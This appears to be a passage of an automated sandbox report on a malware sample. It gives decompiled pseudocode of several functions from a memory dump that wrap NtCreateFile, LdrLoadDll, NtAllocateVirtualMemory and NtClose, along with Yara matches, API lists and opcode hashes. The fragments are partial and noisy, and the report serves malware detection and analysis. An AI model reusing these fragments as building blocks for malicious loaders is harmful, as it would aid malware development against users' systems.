                                                                                                                          C-Code - Quality: 68%
                                                                                                                          			E00419F74(void* __eax, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t23;
				void* _t33;

				asm("cld");
				asm("sbb eax, 0x8b55eba0");
				_t17 = _a4;
				_t3 = _t17 + 0xc40; // 0xc40
				E0041AB20(_t33, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t11 =  &_a20; // 0x414b77
				_t23 = NtCreateFile(_a8, _a12, _a16,  *_t11, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t23;
			}





                                                                                                                          0x00419f76
                                                                                                                          0x00419f1d
                                                                                                                          0x00419f23
                                                                                                                          0x00419f2f
                                                                                                                          0x00419f37
                                                                                                                          0x00419f59
                                                                                                                          0x00419f6d
                                                                                                                          0x00419f71

                                                                                                                          APIs
                                                                                                                          • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419F6D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID: wKA
                                                                                                                          • API String ID: 823142352-3165208591
                                                                                                                          • Opcode ID: 1f282038835892fe2a911355963dae7f061a2992e7c6dfaffda584ea3c3d0ae9
                                                                                                                          • Instruction ID: 958d07229d913f87e4baa3ae89b3a7fbe58ef3a034b199866343c7c2239820d4
                                                                                                                          • Opcode Fuzzy Hash: 1f282038835892fe2a911355963dae7f061a2992e7c6dfaffda584ea3c3d0ae9
                                                                                                                          • Instruction Fuzzy Hash: 0901F2B2204108AFCB08CF88DC95EEB37EAAF8C354F118209FA1DD3240C630E851CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00419F1A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42filenativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 68%
                                                                                                                          			E00419F1A(void* __edx, HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, char _a16, struct _GUID _a20, long _a24, long _a28, long _a32, long _a36, void* _a40, long _a44) {
				intOrPtr _v0;
				long _t21;
				void* _t33;

				_push(es);
				asm("sbb eax, 0x8b55eba0");
				_t15 = _v0;
				_t3 = _t15 + 0xc40; // 0xc40
				E0041AB20(_t33, _v0, _t3,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x28);
				_t11 =  &_a16; // 0x414b77
				_t21 = NtCreateFile(_a4, _a8, _a12,  *_t11, _a20, _a24, _a28, _a32, _a36, _a40, _a44); // executed
				return _t21;
			}






                                                                                                                          0x00419f1c
                                                                                                                          0x00419f1d
                                                                                                                          0x00419f23
                                                                                                                          0x00419f2f
                                                                                                                          0x00419f37
                                                                                                                          0x00419f59
                                                                                                                          0x00419f6d
                                                                                                                          0x00419f71

                                                                                                                          APIs
                                                                                                                          • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419F6D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID: wKA
                                                                                                                          • API String ID: 823142352-3165208591
                                                                                                                          • Opcode ID: 00413d03e9703152796fabcd5b5efe14935391633a0e48a8fd2306b87820dcc4
                                                                                                                          • Instruction ID: 59240f0c24d42f4f4d5e5ce5e836e36d48a0276155dc8ed090b9bdda842d8758
                                                                                                                          • Opcode Fuzzy Hash: 00413d03e9703152796fabcd5b5efe14935391633a0e48a8fd2306b87820dcc4
                                                                                                                          • Instruction Fuzzy Hash: 1801BDB2205108AFDB08CF98DC95EEB37AAAF8C754F158649FA1DD7241C630EC51CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00419F20, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00419F20(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041AB20(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t11 =  &_a20; // 0x414b77
				_t21 = NtCreateFile(_a8, _a12, _a16,  *_t11, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                                                                                          0x00419f2f
                                                                                                                          0x00419f37
                                                                                                                          0x00419f59
                                                                                                                          0x00419f6d
                                                                                                                          0x00419f71

                                                                                                                          APIs
                                                                                                                          • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419F6D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID: wKA
                                                                                                                          • API String ID: 823142352-3165208591
                                                                                                                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                          • Instruction ID: 918681b749d1ebc684007e4c1563b975095bc633172356dce6c62aeb4b4fe286
                                                                                                                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                          • Instruction Fuzzy Hash: 2DF0B2B2205208ABCB08CF89DC95EEB77ADAF8C754F158249BA0D97241C630F851CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040ACC0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 88%
                                                                                                                          			E0040ACC0(void* __ebx, void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t17;
				intOrPtr _t19;
				struct _OBJDIR_INFORMATION _t20;
				signed int _t25;
				signed int* _t29;

				_v8 =  &_v536;
				_t17 = E0041C810( &_v12, 0x104, _a8);
				if(_t17 != 0) {
					_t19 = E0041CC30(__eflags, _v8);
					__eflags = _t19;
					if(_t19 != 0) {
						_t29 =  &_v12;
						_t25 = E0041CEB0(_t29, 0);
						asm("cmpsb");
						 *_t29 =  *_t29 & _t25;
						_t7 = __ebx + 0x558b08c4;
						 *_t7 =  *((intOrPtr*)(__ebx + 0x558b08c4)) + _t25;
						__eflags =  *_t7;
						asm("les ecx, [eax]");
					}
					_t20 = E0041B060(_v8);
					_v16 = _t20;
					__eflags = _t20;
					if(_t20 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t20;
				} else {
					return _t17;
				}
			}












                                                                                                                          0x0040acdc
                                                                                                                          0x0040acdf
                                                                                                                          0x0040ace9
                                                                                                                          0x0040acf3
                                                                                                                          0x0040acfb
                                                                                                                          0x0040acfd
                                                                                                                          0x0040acff
                                                                                                                          0x0040ad05
                                                                                                                          0x0040ad06
                                                                                                                          0x0040ad07
                                                                                                                          0x0040ad09
                                                                                                                          0x0040ad09
                                                                                                                          0x0040ad09
                                                                                                                          0x0040ad0b
                                                                                                                          0x0040ad0b
                                                                                                                          0x0040ad11
                                                                                                                          0x0040ad19
                                                                                                                          0x0040ad1c
                                                                                                                          0x0040ad1e
                                                                                                                          0x0040ad32
                                                                                                                          0x00000000
                                                                                                                          0x0040ad34
                                                                                                                          0x0040ad3a
                                                                                                                          0x0040acee
                                                                                                                          0x0040acee
                                                                                                                          0x0040acee

                                                                                                                          APIs
                                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD32
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Load
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2234796835-0
                                                                                                                          • Opcode ID: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
                                                                                                                          • Instruction ID: f2ae6e5e7806921c9eae43ef0be609edf832a6aa20f0d9e7e2e66c408c20611a
                                                                                                                          • Opcode Fuzzy Hash: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
                                                                                                                          • Instruction Fuzzy Hash: E40152B5D4020DABDB10DAE1DC82FDEB7789B14308F0041AAA908A7281F634EB54CB95
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0041A04A, Relevance: 1.5, APIs: 1, Instructions: 37nativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 37%
                                                                                                                          			E0041A04A(signed char* __ecx) {

				asm("movsb");
				if (( *__ecx & 0x000000a8) <= 0) goto L3;
			}



                                                                                                                          0x0041a04b
                                                                                                                          0x0041a04f

                                                                                                                          APIs
                                                                                                                          • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 0041A075
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Close
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3535843008-0
                                                                                                                          • Opcode ID: 1dc51e4a20ad0745621d0a36c88979ec0a75884888b3541c6b291b9879b3a170
                                                                                                                          • Instruction ID: 83811c8ca78a33826bc59e76750f49715a77075c99934890fbc3ac5f4e3f867a
                                                                                                                          • Opcode Fuzzy Hash: 1dc51e4a20ad0745621d0a36c88979ec0a75884888b3541c6b291b9879b3a170
                                                                                                                          • Instruction Fuzzy Hash: 41F05476204214AFD710EF98DC40EE777A9EF8C324F14855AFA5C9B241C631E911C7A0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0041A100, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0041A100(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041AB20(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                                                                          0x0041a10f
                                                                                                                          0x0041a117
                                                                                                                          0x0041a139
                                                                                                                          0x0041a13d

                                                                                                                          APIs
                                                                                                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041ACF4,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 0041A139
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateMemoryVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2167126740-0
                                                                                                                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                          • Instruction ID: b7acdae8d3035396bf3a6cabd8be047a375e4a620bd0b44aa6ca3e6eeb15d15e
                                                                                                                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                          • Instruction Fuzzy Hash: 35F015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241C630F810CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0041A050, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 0041A075
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Close
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3535843008-0
                                                                                                                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                          • Instruction ID: b02a98072ae76633dfac5978dec5414655e95fa3032167deae29744f36717898
                                                                                                                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                          • Instruction Fuzzy Hash: B7D01776200214ABD710EB99DC85FE77BADEF48764F15449ABA189B242C530FA1087E0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A098F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 84136e98b8c539dcdc7bc1152f04e11a8c236a8929089585bdc33f02b7a8284b
                                                                                                                          • Instruction ID: f09df2499df8cd06342f466bad1ea290f80e2b0de04fcdece786d66633cd5a27
                                                                                                                          • Opcode Fuzzy Hash: 84136e98b8c539dcdc7bc1152f04e11a8c236a8929089585bdc33f02b7a8284b
                                                                                                                          • Instruction Fuzzy Hash: FC90026160101502D20171694404656040A97D0381F91C432A1014555ECA6589D2F1B1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A09860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 5725289bf9cb9a18bbac1d13960834bbe7db35d50ce7199407658aa744bb3935
                                                                                                                          • Instruction ID: 8cda8a290229feab99281d60757bf8eee6e2f6044de430cbcb682a4c55ad418c
                                                                                                                          • Opcode Fuzzy Hash: 5725289bf9cb9a18bbac1d13960834bbe7db35d50ce7199407658aa744bb3935
                                                                                                                          • Instruction Fuzzy Hash: 5E90027120101413D21161694504747040997D0381F91C822A0414558D96968992F1A1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A09840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 125ced5f95c6c1b051f119c7778bad3fd4c508746aa89f49e68f76fcbeb10bc2
                                                                                                                          • Instruction ID: 7f377594fd477e745db0d2365666abab7a85ba38085e1d36b8c60e47a0b3168f
                                                                                                                          • Opcode Fuzzy Hash: 125ced5f95c6c1b051f119c7778bad3fd4c508746aa89f49e68f76fcbeb10bc2
                                                                                                                          • Instruction Fuzzy Hash: A3900261242051525645B16944045474406A7E0381791C422A1404950C85669896E6A1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A099A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: c86a9d392f07e955db1249360b7cafd45cb4ef6ec5d9ced9444a7faf15cbbc00
                                                                                                                          • Instruction ID: 642dd0def788fb938de69273999da7cd801649df2f03b5e1a960fec64ae0fb7f
                                                                                                                          • Opcode Fuzzy Hash: c86a9d392f07e955db1249360b7cafd45cb4ef6ec5d9ced9444a7faf15cbbc00
                                                                                                                          • Instruction Fuzzy Hash: D49002A134101442D20061694414B460405D7E1341F51C425E1054554D8659CC92B1A6
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A09910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: b31bdde2d1b987717d01bf1dfcde6960e36485f90e409bdde7e54f2892aa4f7a
                                                                                                                          • Instruction ID: c7954daf700f4338adbdfeed6f0069a43556669194b8081608872ad512236bd5
                                                                                                                          • Opcode Fuzzy Hash: b31bdde2d1b987717d01bf1dfcde6960e36485f90e409bdde7e54f2892aa4f7a
                                                                                                                          • Instruction Fuzzy Hash: 099002B120101402D24071694404786040597D0341F51C421A5054554E86998DD5B6E5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A09A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: bc12cc90852784264a41e842c07085119ffbb635f883572748708e36f7ced849
                                                                                                                          • Instruction ID: 3b687e96f199dd21cb378e9f49fe73b3375dc4ba105fcb134f0ba31fb03a36e3
                                                                                                                          • Opcode Fuzzy Hash: bc12cc90852784264a41e842c07085119ffbb635f883572748708e36f7ced849
                                                                                                                          • Instruction Fuzzy Hash: 01900261601010424240717988449464405BBE1351751C531A0988550D859988A5A6E5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A09A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 612cab346faee2a2896b33ff882960138fff993ae0d93629fe18983117be8c71
                                                                                                                          • Instruction ID: 8df89223d9018c177ff8f1eb54fca35c11d7028d3a219ead17575dfc413adddf
                                                                                                                          • Opcode Fuzzy Hash: 612cab346faee2a2896b33ff882960138fff993ae0d93629fe18983117be8c71
                                                                                                                          • Instruction Fuzzy Hash: D690027120141402D2006169481474B040597D0342F51C421A1154555D86658891B5F1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A09A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 7ffc2905b5042f7d04fcdc7a1454891899331500f09ad93d6f973724eee17425
                                                                                                                          • Instruction ID: 1bf617c2e1ee59fc22ddbed6eb5cdbdb23f82eb87c14a0d42622089325ef8903
                                                                                                                          • Opcode Fuzzy Hash: 7ffc2905b5042f7d04fcdc7a1454891899331500f09ad93d6f973724eee17425
                                                                                                                          • Instruction Fuzzy Hash: 2490026121181042D30065794C14B47040597D0343F51C525A0144554CC95588A1A5A1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A095D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 870e9e64f1186944c5edc4c1df5934fee3388847d1cc6cc3687db1af99495f60
                                                                                                                          • Instruction ID: c89522a2b032d0d00dff26a7a0b15994b5a58150f72595e5f04cdba066ffebc9
                                                                                                                          • Opcode Fuzzy Hash: 870e9e64f1186944c5edc4c1df5934fee3388847d1cc6cc3687db1af99495f60
                                                                                                                          • Instruction Fuzzy Hash: C79002A120201003420571694414656440A97E0341B51C431E1004590DC56588D1B1A5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A09540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 49532390988a9440c05f1727f43bd7916d7b47b1aea43f9f1dc51011eb708867
                                                                                                                          • Instruction ID: 6f023eacc869ff7f25b3af23d12435b2af70af3398e7feea62e8707887d18864
                                                                                                                          • Opcode Fuzzy Hash: 49532390988a9440c05f1727f43bd7916d7b47b1aea43f9f1dc51011eb708867
                                                                                                                          • Instruction Fuzzy Hash: 6E900265211010030205A5690704547044697D5391351C431F1005550CD66188A1A1A1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A096E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: db62a5de8047a782413a3a022e9aaab239c389c8b2349557f3af32b72d10dc5a
                                                                                                                          • Instruction ID: 8205e1a92dd3e72244153608506a96a365a32d10630a253063b883e78df6617f
                                                                                                                          • Opcode Fuzzy Hash: db62a5de8047a782413a3a022e9aaab239c389c8b2349557f3af32b72d10dc5a
                                                                                                                          • Instruction Fuzzy Hash: 7690027120109802D2106169840478A040597D0341F55C821A4414658D86D588D1B1A1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A09660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 90142e4dbd1f8e746439b5d0629a8375845f5fc80f0b3866089a85d99ccc6515
                                                                                                                          • Instruction ID: 58efcbd6f734c61d2ad59f03bbfe76f3c83c9e217c82a060905bc2ba634e7742
                                                                                                                          • Opcode Fuzzy Hash: 90142e4dbd1f8e746439b5d0629a8375845f5fc80f0b3866089a85d99ccc6515
                                                                                                                          • Instruction Fuzzy Hash: 6D90027120101802D2807169440468A040597D1341F91C425A0015654DCA558A99B7E1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A097A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 4b56691091aa963c6f1b74e4d80d8efeff95033091da5b4e4a84147ed1c4afc1
                                                                                                                          • Instruction ID: bc39d063fef2f08a8de5a0600114798c88d7b666a9122f203a008fdcbf199305
                                                                                                                          • Opcode Fuzzy Hash: 4b56691091aa963c6f1b74e4d80d8efeff95033091da5b4e4a84147ed1c4afc1
                                                                                                                          • Instruction Fuzzy Hash: 8890026130101003D240716954186464405E7E1341F51D421E0404554CD9558896A2A2
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A09780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: a0ba5ca90099198f2c2626b4bb2b584521256a85b299a9cbaa7287e55bf2ee7b
                                                                                                                          • Instruction ID: 7a9f111b437a2ce17f5b8e5668e2a5b3ba7da211e4f3bfefa99e87cadca76612
                                                                                                                          • Opcode Fuzzy Hash: a0ba5ca90099198f2c2626b4bb2b584521256a85b299a9cbaa7287e55bf2ee7b
                                                                                                                          • Instruction Fuzzy Hash: 1A90026921301002D2807169540864A040597D1342F91D825A0005558CC95588A9A3A1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A09710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 950e482ae5bd42959139a1ecaec893c700667752a270b6ab420024c450ba823e
                                                                                                                          • Instruction ID: 64f1f5af06b8ba630cc63a7c6f296be1647b0df368996297f46b3b2ce2f2b3b1
                                                                                                                          • Opcode Fuzzy Hash: 950e482ae5bd42959139a1ecaec893c700667752a270b6ab420024c450ba823e
                                                                                                                          • Instruction Fuzzy Hash: 1A90027120101402D20065A95408686040597E0341F51D421A5014555EC6A588D1B1B1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00409A80, Relevance: .1, Instructions: 92COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 05080370210f75a5a3fe5c957c173717e9568a082d75643143bc41a952943554
